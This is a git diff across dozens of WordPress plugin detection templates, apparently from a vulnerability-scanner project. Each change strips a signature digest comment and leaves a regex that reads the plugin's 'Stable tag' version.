a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml index 90e40a042c..7b47adc274 100644 --- a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml +++ b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100c36598c9cc75f34a3a932b20ee9295702f33efefc33831346baf8ba09013ad79022100985b0ca224badbdcf129e70a79aadf8547886c248af8314c97ca7b119a18dbcd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/templately.yaml b/http/technologies/wordpress/plugins/templately.yaml index 1426d2b26e..286dfdaec6 100644 --- a/http/technologies/wordpress/plugins/templately.yaml +++ b/http/technologies/wordpress/plugins/templately.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402206b8b3ea9994aca271150c927ec680d679e8f2d40eb63bf3055edaccd8f167ae1022078dcecf311931af631666ca36e176421f75eba3339a7e3e2f25f636dd159f026:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/the-events-calendar.yaml b/http/technologies/wordpress/plugins/the-events-calendar.yaml index d737060f24..c4928059f6 100644 --- a/http/technologies/wordpress/plugins/the-events-calendar.yaml +++ b/http/technologies/wordpress/plugins/the-events-calendar.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402202fea1bf2d48770fc4fbcc554aa9cef723bf56caa18e56864505103c7358fde7402202cd4ccb764fb1cf9177cfb3d069f08594266b5093a5b2b58cd808278edb10339:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/tinymce-advanced.yaml b/http/technologies/wordpress/plugins/tinymce-advanced.yaml index 66a105c519..f6a7836f35 100644 --- a/http/technologies/wordpress/plugins/tinymce-advanced.yaml +++ b/http/technologies/wordpress/plugins/tinymce-advanced.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402201746f3f62ba854d46255ac026fc3ea78889924e9ed43b577ab7efd4a13a26d0c02201d6fbf8d38ae2962ae43ce15a92528d4d6c33fb778c8f3496b9f5726e0c990f8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml index 82f2dc715e..b7af708c4f 100644 --- a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml +++ b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100a42204a78fdb50361b2bab7584eddf9ed4f3ba2d72f89fcc6e3db2b97da9c65302210081e34b6057c03809d84a336f1b8c447c0e0b1af6e9e7b55b375cee8148a045e5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml index da39da3d19..61a793edf7 100644 --- a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220740080347f4b8ea0dc36b16649aecb31f6bea55dfab2df46cd7db486ac70a0c902210091100d0ad386191b3dceef5f8baf06d2e46372d7adf04de0f64102276e6a57ba:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/under-construction-page.yaml b/http/technologies/wordpress/plugins/under-construction-page.yaml index 49ec7c970b..0da88d5d3f 100644 --- a/http/technologies/wordpress/plugins/under-construction-page.yaml +++ b/http/technologies/wordpress/plugins/under-construction-page.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220543eca4d585e4fb63e3c17abd7dce63ab67b17788a2873cc6ef7ec61dcb05290022010eb3ded875287eb7735ea11336600039ee16be233819f0a9fa5f1a604ec9f31:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/updraftplus.yaml b/http/technologies/wordpress/plugins/updraftplus.yaml index 02e8bdab0b..2b29428cf1 100644 --- a/http/technologies/wordpress/plugins/updraftplus.yaml +++ b/http/technologies/wordpress/plugins/updraftplus.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100d233fb53510e7a4a38c85339516d3793eb45b98966b26b670ef012d132cecc810220468c8523a8e34e6d34d586bd0a15736fef0dc8e2576883e98dd81b5b8746631d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/user-role-editor.yaml b/http/technologies/wordpress/plugins/user-role-editor.yaml index 9b3d1edbfa..181e619a7c 100644 --- a/http/technologies/wordpress/plugins/user-role-editor.yaml +++ b/http/technologies/wordpress/plugins/user-role-editor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402200225471835b0282c9a0a3bb1439f4ea7d759167d46475d00e1dd34462b78b9a902203bccb19818ee16b8b5b55fac2777b1082b9b34d39bb7b2ac22b0943d65bfc293:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/w3-total-cache.yaml b/http/technologies/wordpress/plugins/w3-total-cache.yaml index 0251fe7757..8164eb4483 100644 --- a/http/technologies/wordpress/plugins/w3-total-cache.yaml +++ b/http/technologies/wordpress/plugins/w3-total-cache.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402206bd4b5f92665974ead76cd6f81be7d9593ed48d433397af98a126e7cb12453ef02203030894f62bcde694efbfccc83c49efce5bdca935cde22b1dd9e600ee9a1e5c4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml index 489c3d65cd..59554defdf 100644 --- a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml +++ b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100dc042a77e356ced2b6fd9f2e90b9b108e598832bb5a63c39ce1286a3e81729b9022100c2e659263bcd0fdb68d2a10f0133f6d6e6ecf3367e4e1d69b164c8a4397c6a56:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/webp-express.yaml b/http/technologies/wordpress/plugins/webp-express.yaml index febda8083f..350fd9436b 100644 --- a/http/technologies/wordpress/plugins/webp-express.yaml +++ b/http/technologies/wordpress/plugins/webp-express.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100c69d3bfa799cf41f99bab5ecdd98571e675e559db7d5f0aff26201541da55334022016326280a2f99b05dc954439c4d774a1b1de5efccb4c0ccd23e3da8446c92dad:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml index 322bc8ca55..2ae6bafbba 100644 --- a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml +++ b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022034f40e2527edd66b6797dde02b84fd0aa49d0295d247eaf4c2003173535dc36802206edf0fdecae1ce3f0cb19eacd6a91cba99ba974506752a0dea4755fbbadbfb52:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml index c534865cdb..d0dc8d92bb 100644 --- a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml +++ b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220396ea0f808a1eca0b5cb05b34c80108810397b89d689d7cc6c27415cbbaec47502203cc7c9633ae7b18b945901de2c6fef7ae91e559023b15a1eaca4d281a6729b1c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml index 8b42336c57..c49bbc2b6d 100644 --- a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml +++ b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a0048304602210085ae162d85f69546c5dce8fb5fe111cc318f0f70bb9d30367e4fe08741589be7022100de6a28d6c09d679de5ca7f0eb3f8c1342bfcc2ca67345429d8bf610c62b31c56:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml index da53bf12e0..27586cbd9d 100644 --- a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml +++ b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100c8a8d85fea21e68a24758dba48216a6cf18eb47c68ebdeb6ca90e392c38b6106022100c6b7ce9d93cdfedc3c03aabf83ffdf53f8881156d93015d6faa802da96dc1700:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml index be131e7dab..946272f0a9 100644 --- a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502201bf04802b91778da3ab13333513c40efbea485103ab535cde8ceab9fdb896e73022100fd7cb1d3f5292d26089c6726b1f8907afea0902db73de56d39ddf2db1d3cb04e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml b/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml index a503496ee9..aa29706872 100644 --- a/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502207735da4fbd555d90df6fa5ae8eb77ea9006536cc89d74210b504ac608f5ed2ed022100c1c5e341f7cdb051a663f73d723a87f6ab2f17ce2f96ed8c891b20cf298ce08d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-payments.yaml index aaeb646eb3..290d53ab7e 100644 --- a/http/technologies/wordpress/plugins/woocommerce-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-payments.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221008f7e2d16e6725024b97321d9313b8aa859b5187eab482ba811412d201ff39584022100b24646495074e2944246db4b9ac6d9f6714495b295b288c946316640d97ec644:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml index 5b05f353d2..f7c9ef9b1f 100644 --- a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022072d5d9cc5c8d8fe2ad3ae89c6ec1d49b693f631f324da14ed52b7a2cd7fe6a39022100f44208abf96116a5262f1c9df5dc2d752ac397ebbb9ed90cf0af6949e482ffbf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml index 3110f68c03..f1c16275a2 100644 --- a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402206978f2a5eeb0e4e06ea8fd84816808dc136d317210063c6d3d8bbf2af5f091db02206a7a4decf092781356e14b3fec61f36c664fef9e1d0471977b599701ceb67e23:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-services.yaml b/http/technologies/wordpress/plugins/woocommerce-services.yaml index b6b805e7aa..fc072e19d8 100644 --- a/http/technologies/wordpress/plugins/woocommerce-services.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-services.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100b20fb98d302e77b17d7fdbb9d91f39237639f6bc5454be1223de7a055487670402204b5a35562696757bae01c7d25a1de495b3fbf4d94e0fb2a1748bb0659cb40e06:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce.yaml b/http/technologies/wordpress/plugins/woocommerce.yaml index 3f153dcb31..da9df0e8a5 100644 --- a/http/technologies/wordpress/plugins/woocommerce.yaml +++ b/http/technologies/wordpress/plugins/woocommerce.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100e33069f7306ae534b000668126a7d2e5cff20ac25362949bb94a6010b35c0062022035f44aad1774c9f430ac075062581d934a60586b2fb6a90d6101aab9683ddba6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordfence.yaml b/http/technologies/wordpress/plugins/wordfence.yaml index 709a7cad25..f8113d9750 100644 --- a/http/technologies/wordpress/plugins/wordfence.yaml +++ b/http/technologies/wordpress/plugins/wordfence.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402207249df520ad7fcf503dd3275423b58b20d82975a96541e21524999e35378b2f8022044d22547ed6626f6f58412e61ef0ee2206b0a2c4f60edae3f32f2c87dfb8556d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordpress-importer.yaml b/http/technologies/wordpress/plugins/wordpress-importer.yaml index 11eaffd989..5f80282ab2 100644 --- a/http/technologies/wordpress/plugins/wordpress-importer.yaml +++ b/http/technologies/wordpress/plugins/wordpress-importer.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402203d6e839cd2b47ee5b38a5d9d4b09c3d08034da1b12892d330b211f92177f83e10220387453835006479e1dccaa349539ac639a86cff94d5f9d28c69c83889e5d577a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordpress-seo.yaml b/http/technologies/wordpress/plugins/wordpress-seo.yaml index 5921cd6a5b..5725d5bb3f 100644 --- a/http/technologies/wordpress/plugins/wordpress-seo.yaml +++ b/http/technologies/wordpress/plugins/wordpress-seo.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022038c9511eb9a2ab504e207edb05687b4b0c90969cd45be71109b2e4cbd2679c4702207640388f7b296c86bef7cd4b6abe548cb049089a09f6c5c279508947d82d643e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/worker.yaml b/http/technologies/wordpress/plugins/worker.yaml index 7579e83c8d..f67a8bc18a 100644 --- a/http/technologies/wordpress/plugins/worker.yaml +++ b/http/technologies/wordpress/plugins/worker.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502204697b75f7f12aa99e4b47c595a95ccac8c1976bef3f0e0e2862225156dc68ec3022100973dc1bad9b666521fcb7b425c7a4dd782b940ccd0aa7683895ba5219b9d7276:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-crontrol.yaml b/http/technologies/wordpress/plugins/wp-crontrol.yaml index a5a784f31e..a773829b7d 100644 --- a/http/technologies/wordpress/plugins/wp-crontrol.yaml +++ b/http/technologies/wordpress/plugins/wp-crontrol.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221009727c94add2088a16fc7c11936ef9b510d155778d2623ef7bc78d7cc75cbd6d602206f8451373d3831252f81b843ab0f241707d0ab873614f3a5b8965f3b055b7b85:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml index af995b1ac0..b9bd4be0a8 100644 --- a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022033a0fc385c571da98b5716d81fc1d79af06ce232b724957e1462fe63c8cdaa93022047012171fba62e7a74ee9f9eec6e1cc2b91f9abe37c1419fab6720fc4ffca34c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-file-manager.yaml b/http/technologies/wordpress/plugins/wp-file-manager.yaml index dd6d8f8b92..bece4ce486 100644 --- a/http/technologies/wordpress/plugins/wp-file-manager.yaml +++ b/http/technologies/wordpress/plugins/wp-file-manager.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402206dc0069eb4c69e49587a9c4ac6111d54f761ad76743ba3566cc7cf374ed8435002205a28908fce1c00805280f5072b80476215e8d98bb7200a6b42d4b798edd3bf77:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-google-maps.yaml b/http/technologies/wordpress/plugins/wp-google-maps.yaml index bfb8f96050..138b0aa9a6 100644 --- a/http/technologies/wordpress/plugins/wp-google-maps.yaml +++ b/http/technologies/wordpress/plugins/wp-google-maps.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100aadbe7739a840e6a0a73acbdffab30036d053dc539a92cec967b0ca6661c5d8502200c059e8ea4634427858269d7c3f7e771d8491962c2d895f27e2b600ec065751c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml index 60bff1dac4..68bf71bc83 100644 --- a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml +++ b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220509ed99458adebf73ba6a1544a3ed9ec6a2725a41f0099e03599f9b72b438632022100ccde7e77f7c557d190d6ee532d8d5a19db7735344e832bfbb87c721a5c358bd1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml index 7a79deef56..10dad2d2fb 100644 --- a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml +++ b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022049daa7ae0c28b4fe35f761df86cc74f925686d8b65a78ceea049880d8aa62c1902207ab4bccb5b8d03a6aea53812d8c9cb37cf91b1a2580738bbacb21de5e8e57e1b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-migrate-db.yaml b/http/technologies/wordpress/plugins/wp-migrate-db.yaml index 2c59597026..e9efe6fb53 100644 --- a/http/technologies/wordpress/plugins/wp-migrate-db.yaml +++ b/http/technologies/wordpress/plugins/wp-migrate-db.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502207ce8ba9e536dc4e9745bd6ecd1f70e0d107e793f9666d3a403abca2364e09c8a022100bb1df911f805e6b746f15758f663c0602ed6541bffd221278570c9cd8c418e4e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml index f1e14c8274..c3d10f0135 100644 --- a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml +++ b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100cddad8b56797a61198b10b8eff72b08094039b522fb6efbf017c911d068ed4ae022100ed5f7418c3b2289998a68442c6b8833eeaa45766ca1d44b50cd8ad4c91826ed6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-optimize.yaml b/http/technologies/wordpress/plugins/wp-optimize.yaml index d17efd380f..4a8bc6b75c 100644 --- a/http/technologies/wordpress/plugins/wp-optimize.yaml +++ b/http/technologies/wordpress/plugins/wp-optimize.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402201eed31729980408179239c38b22002287404e9494c562bf765a2f8d63d91e8e402202d993c7b8c1ce041bdc1f42d29c120966ed186b424d9577f0a9d22af9b6e3e94:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-pagenavi.yaml b/http/technologies/wordpress/plugins/wp-pagenavi.yaml index fed04b3fc4..d2c74355bd 100644 --- a/http/technologies/wordpress/plugins/wp-pagenavi.yaml +++ b/http/technologies/wordpress/plugins/wp-pagenavi.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100b9a5a2faca84daa8a74b32020f45abfbba913686c6701d36c97b1fabd848d4c002204eee008999f79cb1718b28cd7a928e5659fc6fae9ae5bfc6704f77d24bb32198:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-reset.yaml b/http/technologies/wordpress/plugins/wp-reset.yaml index ac1bcd84cd..94b8494b08 100644 --- a/http/technologies/wordpress/plugins/wp-reset.yaml +++ b/http/technologies/wordpress/plugins/wp-reset.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402206cdedd174e07ace79078b3fdfa1bbdf00373cbf1ccca98c2278efa69a2b66b2c02204f4c9123aedc1aea38fdd42b099fe776c278c4ec826b02c7bd0d770d5ead0692:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml index 7096786cab..108aba79e9 100644 --- a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml +++ b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220065153c4545832922fafb426ce15c93585829d339c82b1be974369d0b332638e022100bd485b7ecf8efc69816aca0493813b474769721b7f5aa278793ed55a63438622:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-rollback.yaml b/http/technologies/wordpress/plugins/wp-rollback.yaml index 9b56f0a0c8..f6f6bf5566 100644 --- a/http/technologies/wordpress/plugins/wp-rollback.yaml +++ b/http/technologies/wordpress/plugins/wp-rollback.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221008c51bad14a40eee9b9c0fa0c2b6e601c9de1826032674c39cbf09a0450cd062202201d9b62129f1adee5f082340f91bec6a0de6b5fc23092cb2014c3b78376b9320b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-seopress.yaml b/http/technologies/wordpress/plugins/wp-seopress.yaml index 547223f0f5..483cb7cac7 100644 --- a/http/technologies/wordpress/plugins/wp-seopress.yaml +++ b/http/technologies/wordpress/plugins/wp-seopress.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100b840c9992737385ee8c1ce8a6e42a6eda1be43dda5d7ea4801febb8254e8260e022100f83a31c24c3ff82eab1a0da303678f259aa1659d3c3f74b2259b3be77addaa4a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml index 151169d4cf..a132c98df4 100644 --- a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml +++ b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100da08259ef4341d16043fde598428d2c011ebe1b687c84b30516593253933368c02210080d46c1bcc06a9334cd6556f4d3a14b0e8b193458965dd8f250dab13bd91b987:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-smushit.yaml b/http/technologies/wordpress/plugins/wp-smushit.yaml index dc8710647e..135bbee046 100644 --- a/http/technologies/wordpress/plugins/wp-smushit.yaml +++ b/http/technologies/wordpress/plugins/wp-smushit.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402204573961b5b2a672f5d70628c915417ae0b018b783bfefc65b45ef958a2d4410d022020ebfd477ee028ac61ed0ef7ec868f3cc46b106e89635e8fa7c8df1fd59a260e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-statistics.yaml b/http/technologies/wordpress/plugins/wp-statistics.yaml index 726bc8d866..5b690d96c0 100644 --- a/http/technologies/wordpress/plugins/wp-statistics.yaml +++ b/http/technologies/wordpress/plugins/wp-statistics.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100a263806c0272f67045533ad7260b657b59467c426ad5c92595da516da53370ec022100b10d4a4d5034ebdac337081ea9dbdae7c94b9231ad9dfa10e7c031a470d41390:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-super-cache.yaml b/http/technologies/wordpress/plugins/wp-super-cache.yaml index 3618c14ba4..16c7d6cff5 100644 --- a/http/technologies/wordpress/plugins/wp-super-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-super-cache.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022068967b48171aa8f0880937b8a0f25f635f1e37e36caf822bf7309c4f3d671d270220607741796c65939a9559efbec708c7ed2f9e66726f08fe01a309f6a1a0332e4a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml index b367488775..ab099f357e 100644 --- a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502203eddc36f7df6c346e1f612625ebdea5b63cd21f4ca40d6bcdbfa20a719232a71022100c044cc9384b51d4b20e8bb90b899afa943036fb807f5da25bb4c885d66268220:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml index 44b8ba493f..ad0b8f8fed 100644 --- a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml @@ -46,4 +46,3 @@ http: part: body regex: - 